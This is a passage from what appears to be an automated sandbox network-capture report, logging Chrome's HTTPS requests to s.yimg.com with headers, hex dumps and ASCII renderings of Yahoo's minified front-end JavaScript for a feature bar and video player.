                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this.swiperight()}},{key:"swipeleft",value:function(){this.processTargets("swipeleft")}},{key:"swiperight",value:function(){this.processTargets("swiperight")}},{key:"clearDrag",value:function(){this._util.drag={endX:0,endY:0,overallDirectionX:0,startX:0,s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 68 69 73 2e 67 65 74 54 61 72 67 65 74 73 28 66 2c 61 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 6e 3d 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 7c 7c 42 6f 6f 6c 65 61 6e 28 63 26 26 75 29 3f 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 75 29 7c 7c 72 3a 72 3b 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 3d 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 7c 7c 6e 2c 64 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 6f 3d 6c 28 6e 2c 32 29 2c 69 3d 6f 5b 30 5d 2c 75 3d 6f 5b 31 5d 2c 63 3d 72 2e 63 6c 61 73 73 4c 69 73 74 2c 66 3d 69 2e 72 65 70 6c 61 63 65 28 22 57 69 74 68 53 79 6e 63 55 49 44 65 6c 61 79 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 22 57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: his.getTargets(f,a).forEach(function(r){var n=t._util.focusTarget||Boolean(c&&u)?r.querySelector(u)||r:r;t._util.focusTarget=t._util.focusTarget||n,d.forEach(function(n){var o=l(n,2),i=o[0],u=o[1],c=r.classList,f=i.replace("WithSyncUIDelay","").replace("W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 26 26 28 22 31 22 3d 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6b 65 79 3f 72 2e 67 65 74 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 5b 30 5d 5b 30 5d 3d 22 61 64 64 22 3a 72 2e 67 65 74 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 5b 30 5d 5b 30 5d 3d 22 72 65 6d 6f 76 65 22 2c 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 64 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ("stateChange")&&("1"===this._util.key?r.get("stateChange")[0][0]="add":r.get("stateChange")[0][0]="remove",this.processTargets("stateChange"))}},{key:"destroy",value:function(){this.removeEventListeners(),d(t.prototype.__proto__||Object.getPrototypeOf(t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC733INData Raw: 75 29 7d 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 75 7d 72 65 74 75 72 6e 20 75 28 74 2c 65 29 2c 53 28 74 2c 5b 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 50 28 64 6f 63 75 6d 65 6e 74 2c 22 6b 65 79 64 6f 77 6e 22 2c 74 68 69 73 2e 5f 68 61 6e 64 6c 65 4b 65 79 44 6f 77 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 4b 65 79 44 6f 77 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 3d 65 7c 7c 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2c 65 2e 6b 65 79 43 6f 64 65 29 7b 63 61 73 65 20 32 37 3a 76 61 72 20 74 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 72 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: u)}),u.addEventListeners(),u}return u(t,e),S(t,[{key:"addEventListeners",value:function(){P(document,"keydown",this._handleKeyDown)}},{key:"_handleKeyDown",value:function(e){switch(e=e||window.event,e.keyCode){case 27:var t=this._state.elementInstances,r=


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              82192.168.2.45110387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC589OUTGET /aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC763INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: l/R5Gubcklrbp45ShS4sP6ej6MKD6iI/5VbP05TYQGAfpg8ckZc+bJaBU8syWQNciuR9zLKA37T9sMcUXEP01aHRQwgQ+V8n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: YDNCAWKCME4NV9E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Wed, 02 Oct 2024 16:47:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 04 Aug 2022 04:32:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "12732500bc8e47693f0d777bbe88001c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: ktIqZY5t35wTM4d07XFqB.S0kDb7QpBg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 1615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 527168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 22 66 65 61 74 75 72 65 62 61 72 49 64 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 72 65 61 63 74 2d 77 61 66 65 72 2d 46 65 61 74 75 72 65 62 61 72 22 29 5b 30 5d 3b 69 66 28 65 29 7b 69 66 28 65 2e 63 6c 61 73 73 4c 69 73 74 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 75 74 6f 2d 63 6c 6f 73 65 22 29 29 7b 76 61 72 20 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 66 65 61 74 75 72 65 62 61 72 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-conte
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC315INData Raw: 73 6c 61 74 65 59 28 22 2b 72 2b 22 29 22 29 7d 29 29 2c 75 28 29 29 7d 76 61 72 20 66 3d 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 73 63 72 6f 6c 6c 2d 74 6f 2d 73 68 6f 77 22 29 3b 63 6f 6e 73 74 20 6d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 63 72 6f 6c 6c 2d 74 68 72 65 73 68 6f 6c 64 22 29 7c 7c 31 38 30 30 3b 69 66 28 66 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 29 7b 63 6f 6e 73 74 20 77 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 2e 74 68 72 6f 74 74 6c 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 73 63 72 6f 6c 6c 59 3e 3d 6d 26 26 28 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 56 28 68 29 22 29 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 6d 6f 76 65 4c 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: slateY("+r+")")})),u())}var f=e.classList.contains("scroll-to-show");const m=e.getAttribute("data-scroll-threshold")||1800;if(f&&window.wafer){const w=window.wafer.utils.throttle((function(t){t.scrollY>=m&&(e.classList.remove("V(h)"),window.wafer.removeLi


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              83192.168.2.45110187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC538OUTGET /aaq/wf/wf-video-3.2.2-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: XkPYJfjXPGyjwMl6rKnTPAaAoK2e7LAd0LtPBn9MXl0O+Z+12tZlehldU9PrvpHi1PTzpir6bd8=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: BQA0M2S1DV9XYCDM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 06 Oct 2024 02:39:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 16 Sep 2024 04:28:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "d133cbea9c1d56d1cbe4cb6e77f0ebf6"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 9YmMglcw85BjD8aFXilrFBHITet6QmcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 30142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 232468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 76 69 64 65 6f 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 76 69 64 65 6f 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 76 61 72 20 69 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 65 29 74 2e 69 6e 64 65 78 4f 66 28 61 29 3e 3d 30 7c 7c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function r(e,t){var i={};for(var a in e)t.indexOf(a)>=0||Object.prototype.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 61 29 7b 72 65 74 75 72 6e 20 69 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 69 29 2c 61 26 26 65 28 74 2c 61 29 2c 74 7d 7d 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 69 2c 61 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 69 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 65 28 6f 2c 69 2c 61 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: }return function(t,i,a){return i&&e(t.prototype,i),a&&e(t,a),t}}(),f=function e(t,i,a){null===t&&(t=Function.prototype);var n=Object.getOwnPropertyDescriptor(t,i);if(void 0===n){var o=Object.getPrototypeOf(t);return null===o?void 0:e(o,i,a)}if("value"in n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 7b 7d 3a 74 2c 61 3d 72 28 65 2c 5b 22 6d 65 74 61 64 61 74 61 22 5d 29 3b 72 65 74 75 72 6e 20 76 28 7b 7d 2c 61 2c 69 29 7d 29 7c 7c 6e 75 6c 6c 2c 77 3d 76 6f 69 64 20 30 3b 69 66 28 6c 29 7b 76 61 72 20 43 3d 6c 5b 22 73 6f 75 72 63 65 2d 6d 65 74 61 64 61 74 61 2d 70 6c 75 67 69 6e 22 5d 7c 7c 7b 7d 2c 62 3d 43 5b 22 6d 65 64 69 61 2f 73 61 70 69 22 5d 3b 62 26 26 28 77 3d 7b 63 75 73 74 6f 6d 50 61 72 61 6d 73 3a 62 2e 71 73 7d 29 7d 76 61 72 20 45 3d 70 2e 64 6f 63 6b 69 6e 67 2c 50 3d 72 28 70 2c 5b 22 64 6f 63 6b 69 6e 67 22 5d 29 2c 6b 3d 6e 75 6c 6c 3b 69 66 28 45 29 7b 76 61 72 20 4f 3d 45 2e 65 6e 61 62 6c 65 4f 6e 53 63 72 6f 6c 6c 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: on(e){var t=e.metadata,i=void 0===t?{}:t,a=r(e,["metadata"]);return v({},a,i)})||null,w=void 0;if(l){var C=l["source-metadata-plugin"]||{},b=C["media/sapi"];b&&(w={customParams:b.qs})}var E=p.docking,P=r(p,["docking"]),k=null;if(E){var O=E.enableOnScrollD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 41 74 74 72 69 62 75 74 65 28 5f 2b 22 70 61 75 73 65 2d 77 68 65 6e 2d 6f 75 74 2d 6f 66 2d 76 69 65 77 70 6f 72 74 22 29 2c 77 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 6d 61 6e 61 67 65 2d 6f 6e 2d 69 6e 74 65 72 61 63 74 69 6f 6e 22 29 2c 43 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 6c 6f 6f 70 2d 63 6f 75 6e 74 22 29 2c 45 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 69 64 22 29 2c 50 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 74 61 72 67 65 74 22 29 2c 6b 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 76 69 65 77 61 62 69 6c 69 74 79 22 29 2c 4f 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 70 61 75 73 65 2d 76 69 65 77 61 62 69 6c 69 74 79 22 29 2c 56 3d 65 2e 67 65 74 41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Attribute(_+"pause-when-out-of-viewport"),w=e.getAttribute(_+"manage-on-interaction"),C=e.getAttribute(_+"loop-count"),E=e.getAttribute(_+"id"),P=e.getAttribute(_+"target"),k=e.getAttribute(_+"viewability"),O=e.getAttribute(_+"pause-viewability"),V=e.getA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 28 29 2c 6c 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 54 69 6d 65 6f 75 74 3d 6e 75 6c 6c 29 2c 22 79 76 69 64 65 6f 50 6c 61 79 6c 69 73 74 22 3d 3d 3d 63 26 26 6c 2e 70 6c 61 79 6c 69 73 74 44 69 64 4d 6f 75 6e 74 28 53 2c 45 29 2c 6c 7d 72 65 74 75 72 6e 20 6f 28 74 2c 65 29 2c 63 28 74 2c 5b 7b 6b 65 79 3a 22 70 6c 61 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 70 6c 61 79 65 72 3b 65 26 26 28 65 2e 69 73 50 6c 61 79 69 6e 67 28 29 7c 7c 65 2e 70 6c 61 79 28 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 70 6c 61 79 69 6e 67 3d 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 70 61 75 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 70 6c 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (),l._state.mouseTimeout=null),"yvideoPlaylist"===c&&l.playlistDidMount(S,E),l}return o(t,e),c(t,[{key:"play",value:function(){var e=this._util.player;e&&(e.isPlaying()||e.play(),this._state.playing=!0)}},{key:"pause",value:function(){var e=this._util.pla
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 22 79 76 69 64 65 6f 22 3d 3d 3d 6e 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 49 6e 73 74 61 6e 63 65 46 72 6f 6d 55 75 69 64 43 6f 6c 6c 65 63 74 69 6f 6e 28 29 2c 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 63 72 65 61 74 65 44 65 66 61 75 6c 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this.removeEventListeners(),"yvideo"===n&&this.removeInstanceFromUuidCollection(),f(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"destroy",this).call(this)}},{key:"_createDefault",value:function(){var e=this;if(arguments.length>0&&void 0!==ar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 76 69 64 65 6f 2d 64 65 66 61 75 6c 74 22 29 3b 76 61 72 20 70 3d 75 2c 6d 3d 28 70 2e 68 65 69 67 68 74 2c 70 2e 77 69 64 74 68 2c 72 28 70 2c 5b 22 68 65 69 67 68 74 22 2c 22 77 69 64 74 68 22 5d 29 29 2c 68 3d 7b 7d 3b 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 79 76 69 64 65 6f 22 29 2c 66 26 26 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 2e 61 70 70 6c 79 28 79 2e 63 6c 61 73 73 4c 69 73 74 2c 66 29 2c 75 2e 66 6f 72 63 65 44 69 73 61 62 6c 65 46 69 72 73 74 41 64 26 26 50 28 22 79 76 61 70 46 22 29 3b 76 61 72 20 67 3d 76 28 7b 73 74 61 72 74 73 63 72 65 65 6e 3a 7b 73 68 6f 77 54 69 74 6c 65 3a 21 30 2c 73 68 6f 77 44 65 73 63 3a 21 30 2c 73 68 6f 77 50 72 6f 76 69 64 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: List.add("wafer-video-default");var p=u,m=(p.height,p.width,r(p,["height","width"])),h={};y.classList.add("wafer-yvideo"),f&&y.classList.add.apply(y.classList,f),u.forceDisableFirstAd&&P("yvapF");var g=v({startscreen:{showTitle:!0,showDesc:!0,showProvider
